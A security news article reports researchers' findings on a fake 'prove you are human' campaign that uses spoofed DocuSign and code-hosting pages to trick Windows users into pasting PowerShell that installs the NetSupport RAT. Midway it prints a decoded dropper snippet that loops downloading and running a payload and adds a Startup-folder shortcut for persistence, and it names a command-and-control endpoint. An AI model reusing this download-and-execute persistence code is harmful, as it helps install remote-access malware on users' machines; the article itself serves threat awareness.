Cybersecurity researchers have uncovered a sophisticated malware campaign that weaponizes users’ trust in routine internet verification processes to deliver malicious payloads.

The scheme exploits familiar “prove you are human” prompts, transforming seemingly innocent website interactions into vectors for malware distribution across Windows systems worldwide.

The campaign employs deceptive websites that mimic legitimate services, including spoofed Gitcodes repositories and fraudulent DocuSign verification pages, to trick users into executing malicious PowerShell scripts on their machines.

Victims are manipulated into copying and pasting these scripts directly into their Windows Run prompt, initiating a cascade of automated downloads that ultimately install the NetSupport Remote Access Trojan (RAT) on infected systems.

DomainTools analysts identified this malicious multi-stage downloader campaign targeting Windows users through carefully crafted social engineering techniques.

The researchers discovered that threat actors are leveraging multiple themed websites to host PowerShell scripts designed to bypass traditional security measures through their staged approach.

The campaign represents a significant evolution in social engineering tactics, as it requires victims to actively participate in their own compromise while believing they are completing legitimate verification procedures.

The attack infrastructure demonstrates remarkable sophistication, utilizing multiple registrars including Cloudflare, NameCheap, and NameSilo, with name servers distributed across cloudflare.com, luxhost.org, and namecheaphosting.com.

This distributed approach enhances the campaign’s resilience against takedown efforts while providing attackers with multiple fallback options for payload delivery.

Advanced Clipboard Poisoning and Infection Mechanism

The most insidious aspect of this campaign lies in its clipboard poisoning technique, particularly evident in the fake DocuSign verification pages.

When victims encounter these fraudulent sites, they are presented with interfaces that closely resemble legitimate Cloudflare browser checking pages mixed with DocuSign branding.

Upon clicking what appears to be a standard CAPTCHA checkbox, the malicious page triggers an “unsecuredCopyToClipboard()” function that silently copies an encoded multi-layered string to the user’s clipboard.

The copied content, initially ROT13 encoded to evade signature detection, decodes to reveal a PowerShell script designed to establish persistence and download additional payloads.

A representative example of the decoded script demonstrates the attack’s methodology:-

while ($true) {
    try {
        (New-Object Net.WebClient).DownloadFile($url, $path);
        if ((Get-Item $path).length -ge 20000) {
            Start-Process $path;
            break;
        }
    } catch {}
    Start-Sleep -Seconds 10;
}
$WScriptShell = New-Object -ComObject WScript.Shell;
$Shortcut = $WScriptShell.CreateShortcut($env:APPDATA + "\Microsoft\Windows\Start Menu\Programs\Startup\wbdims.lnk");
$Shortcut.TargetPath = $path;
$Shortcut.Save();

This script establishes a persistent download loop, automatically retrieves the “wbdims.exe” payload from GitHub, and creates a startup folder shortcut to ensure the malware executes upon each user login.

The multi-stage approach includes additional command-and-control mechanisms, with infected systems checking in via endpoints like “docusign.sa.com/verification/c.php” to signal successful compromise and trigger subsequent payload deliveries.

The campaign’s effectiveness stems from its exploitation of user familiarity with legitimate verification processes, combined with sophisticated technical implementation that segments the attack across multiple stages to evade detection and complicate attribution efforts.

Speed up and enrich threat investigations with Threat Intelligence Lookup! -> 50 trial search requests